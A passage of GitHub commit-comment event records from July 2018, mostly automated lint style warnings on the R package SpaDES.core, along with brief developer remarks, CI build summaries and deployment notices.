lowerCamelCase.**\n```r\n​        sim.out <<- rbindlist(list(sim.out, z.out), use.names = TRUE)\n        ^~~~~~~\n```\n[R/module-dependencies-methods.R:80:5:](https://github.com/PredictiveEcology/SpaDES.core/blob/9835dc24345167370987c6895000957753189c43/R/module-dependencies-methods.R#L80) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​    DT <- dx[, list(from = module, to = i.module,\n    ^~\n```\n[R/module-dependencies-methods.R:83:15:](https://github.com/PredictiveEcology/SpaDES.core/blob/9835dc24345167370987c6895000957753189c43/R/module-dependencies-methods.R#L83) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​    if (plot) DT <- DT[!duplicated(DT[, 1:2, with = FALSE]), ]\n              ^~\n```\n[R/module-dependencies-methods.R:85:5:](https://github.com/PredictiveEcology/SpaDES.core/blob/9835dc24345167370987c6895000957753189c43/R/module-dependencies-methods.R#L85) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​    DT <- data.table(from = character(0), to = character(0),\n    ^~\n```\n[R/module-dependencies-methods.R:164:5:](https://github.com/PredictiveEcology/SpaDES.core/blob/9835dc24345167370987c6895000957753189c43/R/module-dependencies-methods.R#L164) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​    M <- distances(simGraph, mode = \"out\")\n    ^\n```\n[R/module-dependencies-methods.R:196:39:](https://github.com/PredictiveEcology/SpaDES.core/blob/9835dc24345167370987c6895000957753189c43/R/module-dependencies-methods.R#L196) *style:* **`%>%` should always have a space before it and a new line after it, unless the full pipeline fits on one line.**\n```r\n​      missingObjects <- simEdgeList %>% filter(from != to) %>%\n                                    ~~^\n```\n[R/module-dependencies-methods.R:210:26:](https://github.com/PredictiveEcology/SpaDES.core/blob/9835dc24345167370987c6895000957753189c43/R/module-dependencies-methods.R#L210) *style:* **`%>%` should always have a space before it and a new line after it, unless the full pipeline fits on one line.**\n```r\n​    return(newEdgeList %>% data.table() %>% setorder(\"from\", \"to\", \"objName\"))\n                       ~~^\n```\n[R/module-dependencies-methods.R:246:79:](https://github.com/PredictiveEcology/SpaDES.core/blob/9835dc24345167370987c6895000957753189c43/R/module-dependencies-methods.R#L246) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​              loadOrder <- names(simGraph[[tsort, ]]) %>% .[!(. %in% \"_INPUT_\" )]\n                                                                              ^\n```\n[R/module-repository.R:28:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/9835dc24345167370987c6895000957753189c43/R/module-repository.R#L28) *style:* **Lines should not be more than 100 characters.**\n```r\n​#'          (\\url{http://spades-core.predictiveecology.org/articles/ii-modules.html#module-directory-structure-modulename}),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/module-repository.R:52:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/9835dc24345167370987c6895000957753189c43/R/module-repository.R#L52) *style:* **Lines should not be more than 100 characters.**\n```r\n​    zipFiles <- grep(file.path(name, \"data\"), zipFiles, invert = TRUE, value = TRUE) # remove any zip in data folder\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/module-repository.R:293:8:](https://github.com/PredictiveEcology/SpaDES.core/blob/9835dc24345167370987c6895000957753189c43/R/module-repository.R#L293) *style:* **Commented code should be removed.**\n```r\n​      #versionWarning(name, version)\n       ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/module-repository.R:305:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/9835dc24345167370987c6895000957753189c43/R/module-repository.R#L305) *style:* **Lines should not be more than 100 characters.**\n```r\n​        GET(zip, ua, config = list(config(token = pat)), write_disk(localzip, overwrite = overwrite))\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/module-repository.R:401:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/9835dc24345167370987c6895000957753189c43/R/module-repository.R#L401) *style:* **Trailing blank lines are superfluous.**\n```r\n​\n^\n```\n[R/module-repository.R:402:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/9835dc24345167370987c6895000957753189c43/R/module-repository.R#L402) *style:* **Trailing blank lines are superfluous.**\n```r\n​\n^\n```\n[R/moduleMetadata.R:72:6:](https://github.com/PredictiveEcology/SpaDES.core/blob/9835dc24345167370987c6895000957753189c43/R/moduleMetadata.R#L72) *style:* **Commented code should be removed.**\n```r\n​    #metadata <- eval(parse(text = x)) # can't be used because can't evaluate start(sim)\n     ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting-diagrams.R:78:5:](https://github.com/PredictiveEcology/SpaDES.core/blob/9835dc24345167370987c6895000957753189c43/R/plotting-diagrams.R#L78) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​    DT <- tail(completed(sim), n)\n    ^~\n```\n[R/plotting-diagrams.R:173:28:](https://github.com/PredictiveEcology/SpaDES.core/blob/9835dc24345167370987c6895000957753189c43/R/plotting-diagrams.R#L173) *style:* **`%>%` should always have a space before it and a new line after it, unless the full pipeline fits on one line.**\n```r\n​        sapply(ll, NROW) %>% sum() %>% `*`(., 26L)\n                         ~~^\n```\n[R/plotting-diagrams.R:325:7:](https://github.com/PredictiveEcology/SpaDES.core/blob/9835dc24345167370987c6895000957753189c43/R/plotting-diagrams.R#L325) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​      PlotRemovingDots <- function(modDia, plotFn, axes, ...,\n      ^~~~~~~~~~~~~~~~\n```\n[R/plotting-diagrams.R:326:36:](https://github.com/PredictiveEcology/SpaDES.core/blob/9835dc24345167370987c6895000957753189c43/R/plotting-diagrams.R#L326) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​                                   vertex.color,\n                                   ^~~~~~~~~~~~\n```\n[R/plotting-diagrams.R:327:36:](https://github.com/PredictiveEcology/SpaDES.core/blob/9835dc24345167370987c6895000957753189c43/R/plotting-diagrams.R#L327) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​                                   vertex.size,\n                                   ^~~~~~~~~~~\n```\n[R/plotting-diagrams.R:328:36:](https://github.com/PredictiveEcology/SpaDES.core/blob/9835dc24345167370987c6895000957753189c43/R/plotting-diagrams.R#L328) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​                                   vertex.size2,\n                                   ^~~~~~~~~~~~\n```\n[R/plotting-diagrams.R:329:36:](https://github.com/PredictiveEcology/SpaDES.core/blob/9835dc24345167370987c6895000957753189c43/R/plotting-diagrams.R#L329) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​                                   vertex.shape,\n                                   ^~~~~~~~~~~~\n```\n[R/plotting-diagrams.R:330:36:](https://github.com/PredictiveEcology/SpaDES.core/blob/9835dc24345167370987c6895000957753189c43/R/plotting-diagrams.R#L330) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​                                   vertex.label.cex,\n                                   ^~~~~~~~~~~~~~~~\n```\n[R/plotting-diagrams.R:331:36:](https://github.com/PredictiveEcology/SpaDES.core/blob/9835dc24345167370987c6895000957753189c43/R/plotting-diagrams.R#L331) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​                                   vertex.label.family,\n                                   ^~~~~~~~~~~~~~~~~~~\n```\n[R/plotting-diagrams.R:345:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/9835dc24345167370987c6895000957753189c43/R/plotting-diagrams.R#L345) *style:* **Lines should not be more than 100 characters.**\n```r\n​          c(nchar(namesModDia)^0.8 * 10) # use exponential to stretch out, and multiplication to make all bigger\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting.R:6:31:](https://github.com/PredictiveEcology/SpaDES.core/blob/9835dc24345167370987c6895000957753189c43/R/plotting.R#L6) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​                              na.color, zero.color, length){\n                              ^~~~~~~~\n```\n[R/plotting.R:6:41:](https://github.com/PredictiveEcology/SpaDES.core/blob/9835dc24345167370987c6895000957753189c43/R/plotting.R#L6) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​                              na.color, zero.color, length){\n                                        ^~~~~~~~~~\n```\n[R/plotting.R:37:25:](https://github.com/PredictiveEcology/SpaDES.core/blob/9835dc24345167370987c6895000957753189c43/R/plotting.R#L37) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​                        na.color, zero.color, length) {\n                        ^~~~~~~~\n```\n[R/plotting.R:37:35:](https://github.com/PredictiveEcology/SpaDES.core/blob/9835dc24345167370987c6895000957753189c43/R/plotting.R#L37) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​                        na.color, zero.color, length) {\n                                  ^~~~~~~~~~\n```\n[R/plotting.R:86:22:](https://github.com/PredictiveEcology/SpaDES.core/blob/9835dc24345167370987c6895000957753189c43/R/plotting.R#L86) *style:* **Put spaces around all infix operators.**\n```r\n​      eval(parse(text=deparse(elems[[useElem]])), envir=tmp@.envir),\n                    ~^~\n```\n[R/plotting.R:86:56:](https://github.com/PredictiveEcology/SpaDES.core/blob/9835dc24345167370987c6895000957753189c43/R/plotting.R#L86) *style:* **Put spaces around all infix operators.**\n```r\n​      eval(parse(text=deparse(elems[[useElem]])), envir=tmp@.envir),\n                                                      ~^~\n```\n[R/plotting.R:87:12:](https://github.com/PredictiveEcology/SpaDES.core/blob/9835dc24345167370987c6895000957753189c43/R/plotting.R#L87) *style:* **Put spaces around all infix operators.**\n```r\n​      error=function(x) eval(parse(text=deparse(elems[[useElem]])), envir=envir))\n          ~^~\n```\n[R/plotting.R:87:40:](https://github.com/PredictiveEcology/SpaDES.core/blob/9835dc24345167370987c6895000957753189c43/R/plotting.R#L87) *style:* **Put spaces around all infix operators.**\n```r\n​      error=function(x) eval(parse(text=deparse(elems[[useElem]])), envir=envir))\n                                      ~^~\n```\n[R/plotting.R:87:74:](https://github.com/PredictiveEcology/SpaDES.core/blob/9835dc24345167370987c6895000957753189c43/R/plotting.R#L87) *style:* **Put spaces around all infix operators.**\n```r\n​      error=function(x) eval(parse(text=deparse(elems[[useElem]])), envir=envir))\n                                                                        ~^~\n```\n[R/POM.R:128:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/9835dc24345167370987c6895000957753189c43/R/POM.R#L128) *style:* **Lines should not be more than 100 characters.**\n```r\n​#' @param objFnCompare Character string. Either, \"MAD\" or \"RMSE\" indicating that inside the objective\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/POM.R:186:12:](https://github.com/PredictiveEcology/SpaDES.core/blob/9835dc24345167370987c6895000957753189c43/R/POM.R#L186) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​           NaNRetries = NA, logObjFnVals = FALSE, weights, useLog = FALSE) {\n           ^~~~~~~~~~\n```\n[R/POM.R:196:25:](https://github.com/PredictiveEcology/SpaDES.core/blob/9835dc24345167370987c6895000957753189c43/R/POM.R#L196) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​                        NaNRetries, logObjFnVals, weights, useLog) {\n                        ^~~~~~~~~~\n```\n[R/POM.R:213:28:](https://github.com/PredictiveEcology/SpaDES.core/blob/9835dc24345167370987c6895000957753189c43/R/POM.R#L213) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​    if (is.na(NaNRetries)) NaNRetries <- 1\n                           ^~~~~~~~~~\n```\n[R/POM.R:237:11:](https://github.com/PredictiveEcology/SpaDES.core/blob/9835dc24345167370987c6895000957753189c43/R/POM.R#L237) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​          sim_ <- Copy(sim)\n          ^~~~\n```\n[R/POM.R:255:66:](https://github.com/PredictiveEcology/SpaDES.core/blob/9835dc24345167370987c6895000957753189c43/R/POM.R#L255) *style:* **Put spaces around all infix operators.**\n```r\n​          envPOMCalled <- sys.frame(min(grep(\"POM\", sys.calls()))-1)\n                                                                ~^~\n```\n[R/POM.R:322:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/9835dc24345167370987c6895000957753189c43/R/POM.R#L322) *style:* **Lines should not be more than 100 characters.**\n```r\n​          cat(format(unlist(lapply(objectiveRes, function(x) x[[\"value\"]])), digits = 4), dep = \"\\t\")\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/POM.R:360:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/9835dc24345167370987c6895000957753189c43/R/POM.R#L360) *style:* **Lines should not be more than 100 characters.**\n```r\n​      par[whP] <- unlist(deps[[modName]]@parameters$default[deps[[modName]]@parameters$paramName == names(P(sim, modName)[whParamsByMod[whP]])])\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n"}},"created_at":"2018-07-09T18:52:21Z"}
{"id":"7939460667","type":"CommitCommentEvent","actor":{"login":"vadrian89"},"repo":{"name":"probonopd/linuxdeployqt"},"payload":{"comment":{"id":29646245,"position":null,"line":null,"path":null,"commit_id":"ac2d5c21800cb24048aebf371165ddbde229544d","created_at":"2018-07-09T18:52:53Z","updated_at":"2018-07-09T18:52:53Z","author_association":"CONTRIBUTOR","body":"Exactly like this."}},"created_at":"2018-07-09T18:52:53Z"}
{"id":"7939461487","type":"CommitCommentEvent","actor":{"login":"vadrian89"},"repo":{"name":"probonopd/linuxdeployqt"},"payload":{"comment":{"id":29646247,"position":null,"line":null,"path":null,"commit_id":"ac2d5c21800cb24048aebf371165ddbde229544d","created_at":"2018-07-09T18:53:04Z","updated_at":"2018-07-09T18:53:04Z","author_association":"CONTRIBUTOR","body":"Thank you."}},"created_at":"2018-07-09T18:53:04Z"}
{"id":"7939470457","type":"CommitCommentEvent","actor":{"login":"emarinri"},"repo":{"name":"emarinri/planets"},"payload":{"comment":{"id":29646263,"position":1,"line":1,"path":"pluto.txt","commit_id":"12f51017cee7d66e25ac12c334d44d2fedf7dad6","created_at":"2018-07-09T18:54:56Z","updated_at":"2018-07-09T18:54:56Z","author_association":"OWNER","body":"Why is not planet!!"}},"created_at":"2018-07-09T18:54:56Z"}
{"id":"7939473260","type":"CommitCommentEvent","actor":{"login":"KevinKronk"},"repo":{"name":"KevinKronk/planets"},"payload":{"comment":{"id":29646265,"position":1,"line":1,"path":"mars_moon_1.txt","commit_id":"f82519793bd3dd55879740052d7ca599c64b6aa6","created_at":"2018-07-09T18:55:31Z","updated_at":"2018-07-09T18:55:31Z","author_association":"OWNER","body":"nice\r\n"}},"created_at":"2018-07-09T18:55:31Z"}
{"id":"7939475289","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29646267,"position":null,"line":null,"path":null,"commit_id":"96ad8c86bd29641f7ba2dd8e0f9b4c51d4476013","created_at":"2018-07-09T18:55:54Z","updated_at":"2018-07-09T18:55:54Z","author_association":"NONE","body":"remove-curve-type (nealkruis) - x86_64-MacOS-10.9-clang: Build Failed\n\nMessages:\n\n * 10 tests had: AUD diffs.\n * 1 test had: EIO diffs.\n * 1 test had: ESO big diffs.\n * 3 tests had: RDD diffs.\n * 1 test had: ERR diffs.\n\nFailures:\n\n\nintegration Test Summary\n * Passed: 299\n * Failed: 326\n\nregression Test Summary\n * Passed: 622\n * Failed: 1\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-96ad8c86bd29641f7ba2dd8e0f9b4c51d4476013-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-96ad8c86bd29641f7ba2dd8e0f9b4c51d4476013-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-57.47%25-red.png)</a> \n"}},"created_at":"2018-07-09T18:55:54Z"}
{"id":"7939481669","type":"CommitCommentEvent","actor":{"login":"loumalouomega"},"repo":{"name":"KratosMultiphysics/Kratos"},"payload":{"comment":{"id":29646274,"position":37,"line":90,"path":"applications/StructuralMechanicsApplication/custom_constitutive/generic_small_strain_viscoplasticity_3d.h","commit_id":"a8fc8cfc13e59cef14f403d991d621172d872624","created_at":"2018-07-09T18:57:12Z","updated_at":"2018-07-09T18:57:12Z","author_association":"MEMBER","body":"Basically the copy wasn't copying the member variables"}},"created_at":"2018-07-09T18:57:12Z"}
{"id":"7939488141","type":"CommitCommentEvent","actor":{"login":"oblodgett"},"repo":{"name":"alliance-genome/agr_java_software"},"payload":{"comment":{"id":29646287,"position":5,"line":42,"path":"agr_java_core/src/main/java/org/alliancegenome/core/config/ConfigHelper.java","commit_id":"4c2b7a3cf81102e3fec05701d0e4cd5d9d246ed0","created_at":"2018-07-09T18:58:28Z","updated_at":"2018-07-09T18:58:28Z","author_association":"MEMBER","body":"This currently doesn't do anything, also instead of hardcoding this please pass it at runtime."}},"created_at":"2018-07-09T18:58:28Z"}
{"id":"7939490437","type":"CommitCommentEvent","actor":{"login":"conda-forge-linter"},"repo":{"name":"conda-forge/micromagneticmodel-feedstock"},"payload":{"comment":{"id":29646291,"position":null,"line":null,"path":null,"commit_id":"0e0928d2481322c51ebfab6997bd0ef82f939687","created_at":"2018-07-09T18:58:54Z","updated_at":"2018-07-09T18:58:54Z","author_association":"NONE","body":"\nHi! This is the friendly automated conda-forge-webservice.\n\nI updated the Github team because of this commit.\n\n- @davidcortesortuno were added to conda-forge. Welcome to conda-forge!\n  Go to https://github.com/orgs/conda-forge/invitation see your invitation.\n\n- @davidcortesortuno were added to this feedstock maintenance team.\n  You should get push access to this feedstock and CI services.\n\nFeel free to join the community [chat room](https://gitter.im/conda-forge/conda-forge.github.io).\n\nNOTE: Please make sure to not push to the repository directly.\n      Use branches in your fork for any changes and send a PR.\n      More details [here](https://conda-forge.org/docs/conda-forge_gotchas.html#using-a-fork-vs-a-branch-when-updating-a-recipe)\n"}},"created_at":"2018-07-09T18:58:54Z"}
{"id":"7939490606","type":"CommitCommentEvent","actor":{"login":"SUPERNOT"},"repo":{"name":"Bitcoin-com/Wallet"},"payload":{"comment":{"id":29646292,"position":null,"line":null,"path":null,"commit_id":"5696a68029dc25ec48899aeaea8830ca596afc4e","created_at":"2018-07-09T18:58:56Z","updated_at":"2018-07-09T18:58:56Z","author_association":"NONE","body":"Ok"}},"created_at":"2018-07-09T18:58:56Z"}
{"id":"7939491343","type":"CommitCommentEvent","actor":{"login":"marianexyx"},"repo":{"name":"marianexyx/DobotChess"},"payload":{"comment":{"id":29646295,"position":null,"line":null,"path":null,"commit_id":"ddfb33abf55289bd0eee39ea3b38429c20658fe8","created_at":"2018-07-09T18:59:06Z","updated_at":"2018-07-09T18:59:06Z","author_association":"OWNER","body":"Code compile, and work with no hard errors, but can't connect with SQL database, but it's not a big problem to solve (just need to organize SQL code better, because it worked earlier good)."}},"created_at":"2018-07-09T18:59:06Z"}
{"id":"7939491833","type":"CommitCommentEvent","actor":{"login":"SUPERNOT"},"repo":{"name":"Bitcoin-com/Wallet"},"payload":{"comment":{"id":29646296,"position":4,"line":25,"path":"www/views/tab-settings.html","commit_id":"5696a68029dc25ec48899aeaea8830ca596afc4e","created_at":"2018-07-09T18:59:12Z","updated_at":"2018-07-09T18:59:12Z","author_association":"NONE","body":"Ok"}},"created_at":"2018-07-09T18:59:12Z"}
{"id":"7939495129","type":"CommitCommentEvent","actor":{"login":"uira"},"repo":{"name":"lunhg/Assistente"},"payload":{"comment":{"id":29646305,"position":null,"line":null,"path":null,"commit_id":"3c1b45e671a26fa79bb9d6bfd1be9200729f4f9d","created_at":"2018-07-09T18:59:52Z","updated_at":"2018-07-09T18:59:52Z","author_association":"NONE","body":"Pq não a GNUAphero?\r\n"}},"created_at":"2018-07-09T18:59:52Z"}
{"id":"7939496220","type":"CommitCommentEvent","actor":{"login":"BelRija"},"repo":{"name":"BelRija/myChat"},"payload":{"comment":{"id":29646308,"position":null,"line":null,"path":null,"commit_id":"10196c8be6619777daaf8f6b6ac5288cf3bdc292","created_at":"2018-07-09T19:00:05Z","updated_at":"2018-07-09T19:00:05Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.bluemix.net/devops/toolchains/c65cbe3a-93c6-404b-bfcf-fdc329794a72?env_id=ibm%3Ayp%3Aeu-de \"myChat\"): [Delivery Pipeline](https://console.bluemix.net/devops/pipelines/8082f571-1fcd-44eb-8182-121978b3d23f?env_id=ibm%3Ayp%3Aeu-de \"myChat\") deployed [myChat](https://github.com/BelRija/myChat/releases/tag/deploy-ibm-yp-eu-de-Marija.Belova-Student.Reutlingen-University.DE-dev-20180709-185958 \"deploy-ibm-yp-eu-de-Marija.Belova-Student.Reutlingen-University.DE-dev-20180709-185958\") to [dev](https://console.bluemix.net/apps/d1062cbe-ed7c-49cf-afef-28924e703e96?env_id=ibm:yp:eu-de \"ibm:yp:eu-de:Marija.Belova@Student.Reutlingen-University.DE:dev\"), including this commit"}},"created_at":"2018-07-09T19:00:05Z"}
{"id":"7939497813","type":"CommitCommentEvent","actor":{"login":"dcnb"},"repo":{"name":"ctrlshifty/ctrlshifty.github.io"},"payload":{"comment":{"id":29646315,"position":null,"line":null,"path":null,"commit_id":"ce81344d17b60e7d6fadaa316a2a3e116269b9ea","created_at":"2018-07-09T19:00:22Z","updated_at":"2018-07-09T19:00:22Z","author_association":"CONTRIBUTOR","body":"Hey can you upload thes again but as: \r\n\r\ncorey.png, devin.png, and lauren.png\r\n\r\nThe spaces cause problems ... "}},"created_at":"2018-07-09T19:00:22Z"}
{"id":"7939499883","type":"CommitCommentEvent","actor":{"login":"oblodgett"},"repo":{"name":"alliance-genome/agr_java_software"},"payload":{"comment":{"id":29646322,"position":6,"line":22,"path":"agr_java_core/src/main/java/org/alliancegenome/es/index/site/document/GeneDocument.java","commit_id":"4c2b7a3cf81102e3fec05701d0e4cd5d9d246ed0","created_at":"2018-07-09T19:00:45Z","updated_at":"2018-07-09T19:00:45Z","author_association":"MEMBER","body":"This is a departure from how it is done in all the other documents, this overrides the category variable that is in the superclass which is needed for indexing the documents."}},"created_at":"2018-07-09T19:00:45Z"}
{"id":"7939508989","type":"CommitCommentEvent","actor":{"login":"pixelzoom"},"repo":{"name":"phetsims/equality-explorer"},"payload":{"comment":{"id":29646345,"position":null,"line":null,"path":null,"commit_id":"5941375d45148b411ac73b7f958ea71122f29ad2","created_at":"2018-07-09T19:02:38Z","updated_at":"2018-07-09T19:02:38Z","author_association":"CONTRIBUTOR","body":"#102"}},"created_at":"2018-07-09T19:02:38Z"}
{"id":"7939510408","type":"CommitCommentEvent","actor":{"login":"dimitrius-brest"},"repo":{"name":"dimitrius-brest/rodpart"},"payload":{"comment":{"id":29646349,"position":null,"line":null,"path":null,"commit_id":"2d11051501f76977dc5cc14fda304cee009a66cb","created_at":"2018-07-09T19:02:57Z","updated_at":"2018-07-09T19:02:57Z","author_association":"OWNER","body":"Вариант 1 от 27.01.2018"}},"created_at":"2018-07-09T19:02:57Z"}
{"id":"7939514496","type":"CommitCommentEvent","actor":{"login":"blaggacao"},"repo":{"name":"alpinelinux/aports"},"payload":{"comment":{"id":29646355,"position":null,"line":null,"path":null,"commit_id":"02b38ef8a4abb0abc41a202a359c6d0aa2a925e7","created_at":"2018-07-09T19:03:49Z","updated_at":"2018-07-09T19:03:49Z","author_association":"CONTRIBUTOR","body":"\r\nhttps://developers.hp.com/hp-linux-imaging-and-printing/release_notes\r\n\r\n> HPLIP 3.15.4 - This release has the following changes:\r\n> - HPLIP Plugin support for ARMv6,ARMv7 and aarch64 architectures"}},"created_at":"2018-07-09T19:03:49Z"}
{"id":"7939523186","type":"CommitCommentEvent","actor":{"login":"BelRija"},"repo":{"name":"BelRija/myChat"},"payload":{"comment":{"id":29646370,"position":null,"line":null,"path":null,"commit_id":"026cd1a66809bb13bb39e6427ff1725af4bd71f3","created_at":"2018-07-09T19:05:41Z","updated_at":"2018-07-09T19:05:41Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.bluemix.net/devops/toolchains/c65cbe3a-93c6-404b-bfcf-fdc329794a72?env_id=ibm%3Ayp%3Aeu-de \"myChat\"): [Delivery Pipeline](https://console.bluemix.net/devops/pipelines/8082f571-1fcd-44eb-8182-121978b3d23f?env_id=ibm%3Ayp%3Aeu-de \"myChat\") deployed [myChat](https://github.com/BelRija/myChat/releases/tag/deploy-ibm-yp-eu-de-Marija.Belova-Student.Reutlingen-University.DE-dev-20180709-190539 \"deploy-ibm-yp-eu-de-Marija.Belova-Student.Reutlingen-University.DE-dev-20180709-190539\") to [dev](https://console.bluemix.net/apps/d1062cbe-ed7c-49cf-afef-28924e703e96?env_id=ibm:yp:eu-de \"ibm:yp:eu-de:Marija.Belova@Student.Reutlingen-University.DE:dev\"), including this commit"}},"created_at":"2018-07-09T19:05:41Z"}
{"id":"7939528963","type":"CommitCommentEvent","actor":{"login":"vcunat"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":29646387,"position":null,"line":null,"path":null,"commit_id":"298e170b36b79f4c6b19816a7abbf8392a490840","created_at":"2018-07-09T19:06:55Z","updated_at":"2018-07-09T19:06:55Z","author_association":"MEMBER","body":"For reference, the missing `linux_testing` is back 5e10df3982d.  I agree removal was over-zealous, even though the attribute makes not much sense ATM."}},"created_at":"2018-07-09T19:06:55Z"}
{"id":"7939535562","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"PredictiveEcology/SpaDES.core"},"payload":{"comment":{"id":29646397,"position":null,"line":null,"path":null,"commit_id":"abdee694ceed2b56edde8af0ae0b333bffca0170","created_at":"2018-07-09T19:08:18Z","updated_at":"2018-07-09T19:08:18Z","author_association":"NONE","body":"[inst/examples/example_experiment.R:91:5:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/inst/examples/example_experiment.R#L91) *style:* **Commented code should be removed.**\n```r\n​  # library(raster)\n    ^~~~~~~~~~~~~~~\n```\n[inst/examples/example_experiment.R:92:5:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/inst/examples/example_experiment.R#L92) *style:* **Commented code should be removed.**\n```r\n​  # beginCluster(20) # if you have multiple clusters available, use them here to save time\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/examples/example_experiment.R:96:5:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/inst/examples/example_experiment.R#L96) *style:* **Commented code should be removed.**\n```r\n​  # endCluster() # end the clusters\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/examples/example_experiment.R:152:5:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/inst/examples/example_experiment.R#L152) *style:* **Commented code should be removed.**\n```r\n​  # fires <- lapply(sims, function(x) x$landscape$fires) %>% stack\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/examples/example_POM.R:49:5:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/inst/examples/example_POM.R#L49) *style:* **Commented code should be removed.**\n```r\n​  # cl <- makeCluster(detectCores() - 1) # not implemented yet in DEoptim\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/examples/example_POM.R:84:4:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/inst/examples/example_POM.R#L84) *style:* **Commented code should be removed.**\n```r\n​  #stopCluster(cl) # not yet implemented, waiting for DEoptim\n   ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/examples/example_POM.R:107:34:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/inst/examples/example_POM.R#L107) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​    params(sim1)$caribouMovement$N <- pars[2]\n                                 ^\n```\n[inst/examples/example_POM.R:114:5:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/inst/examples/example_POM.R#L114) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​    nPattern_Out <- caribouFn(out$caribou)\n    